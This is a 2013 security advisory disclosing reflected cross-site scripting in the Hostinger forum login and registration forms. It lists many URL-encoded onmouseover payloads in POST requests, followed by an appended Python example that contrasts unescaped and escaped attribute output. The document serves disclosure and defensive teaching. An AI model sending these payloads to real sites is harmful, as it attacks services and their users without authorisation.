Hostinger Web Hosting Multiple Cross Site Scripting

Report-Timeline:
================
2013-06-01: Researcher Notification
2013-06-03: RESPONSE
2013-06-07: Ask About the issues
2013-06-10: Vendor Feedback
2013-06-13: Not Fixed
2013-06-16: Full Disclosure

I-VULNERABILITY
-------------------------
#Title: Hostinger Web Hosting Multiple Cross Site Scripting
#Vendor: http://www.hostinger.es
#Author: Juan Carlos García (@secnight)
#Follow me
http://www.highsec.es
HTTP://WWW.radio3w.com
http://hackingmadrid.blogspot.com
http://blogs.0verl0ad.com
Twitter: @secnight
Facebook: https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn

II-Introduction:
=============
Hostinger® is a free and affordable premium web hosting services provider and domain registrar. Hostinger has grown from a small web hosting provider into a world leading and industry recognized web hosting brand. Hostinger, UAB is proud to be a part of elite ICANN accredited registrars community. Hostinger has successfully localized services in Indonesia, Philippines, Spain, Italy, France, Poland, Romania, Lithuania, Brazil, Argentina, Mexico, Colombia, Russia, Ukraine, and many more countries on their way!

-------------------------

III-PROOF OF CONCEPT
=============
Affected items

/forum/login (5)
/forum/register (8)

Attack details

/forum/login
=============
URL encoded POST input email was set to " onmouseover=prompt(952323) bad="
The input is reflected inside a tag element between double quotes.

POST /forum/login HTTP/1.1

email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1

VARIANTS

email 2
-------
email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1
email=%22%20onmouseover%3dprompt%28982999%29%20bad%3d%22&pass=secnight

pass 3
-------
email=secnight@email.tst&pass=%22%20onmouseover%3dprompt%28952904%29%20bad%3d%22&remember=1
email=secnight@email.tst&pass=%22%20onmouseover%3dprompt%28935474%29%20bad%3d%22
email=secnight%40email.tst&pass=%22%20onmouseover%3dprompt%28993589%29%20bad%3d%22&remember=1

/forum/register
=============
URL encoded POST input confirmPass was set to " onmouseover=prompt(943546) bad="
The input is reflected inside a tag element between double quotes.

POST /forum/register HTTP/1.1

confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&email=secnight@email.tst&name=vbhlwxtb&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_chal

VARIANTS
----------

confirmPass 2
-------------
confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&email=secnight@email.tst&name=vbhlwxtb&pass=Senight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge
confirmPass=%22%20onmouseover%3dprompt%28942726%29%20bad%3d%22&email=secnight%40email.tst&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

email 2
--------
confirmPass=secnight&email=%22%20onmouseover%3dprompt%28982353%29%20bad%3d%22&name=mvjmhkny&pass=Secnightx&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge
confirmPass=secnightx&email=%22%20onmouseover%3dprompt%28978014%29%20bad%3d%22&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

Name 2
-------
confirmPass=secnight&email=secnight@email.tst&name=%22%20onmouseover%3dprompt%28981310%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge
confirmPass=SECNIGHT&email=secnight%40email.tst&name=%22%20onmouseover%3dprompt%28946111%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

pass 2
-------
confirmPass=secnight&email=secnight@email.tst&name=augbmecb&pass=%22%20onmouseover%3dprompt%28956301%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge
confirmPass=secnightx&email=secnight%40email.tst&name=noeoyclk&pass=%22%20onmouseover%3dprompt%28972091%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

IV. CREDITS
-------------------------
This vulnerability has been discovered by Juan Carlos García (@secnight)

V. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage caused by the use or misuse of this information.
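
Added example (not part of the original advisory and not Hostinger's code): the reflection "inside a tag element between double quotes" reported in section III, rendered through a hypothetical input template, next to the same template with attribute-context output encoding. The template markup and all function names are assumptions; the value is the email parameter from the /forum/login request above.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# email value from the advisory's /forum/login request, still URL-encoded.
REPORTED_EMAIL = "%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22"
# Hypothetical template: the advisory does not show the forum's markup.
TEMPLATE = '<input type="text" name="email" value="{}">'

def reported_value():
    """Decode the POST value the way the server's form parser would."""
    return unquote_plus(REPORTED_EMAIL)

def render_unescaped(value):
    """Reflect the value as-is, the behaviour the advisory reports."""
    return TEMPLATE.format(value)

def render_escaped(value):
    """Encode for a double-quoted attribute: & < > " ' become entities."""
    return TEMPLATE.format(escape(value, quote=True))

class _InputAttrs(HTMLParser):
    """Records the attributes of the first <input> start tag."""
    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)

def input_attributes(markup):
    """Return the attributes an HTML parser sees on the first <input>."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs

def injected_attributes(markup, declared=("type", "name", "value")):
    """Attribute names present on the <input> that the template never declared."""
    return sorted(set(input_attributes(markup)) - set(declared))

if __name__ == "__main__":
    for render in (render_unescaped, render_escaped):
        markup = render(reported_value())
        print(render.__name__, markup, injected_attributes(markup), sep="\n  ")
```

The injected_attributes check also works as a regression test for each of the reflected parameters listed above: any attribute outside the declared set means the quote was not encoded.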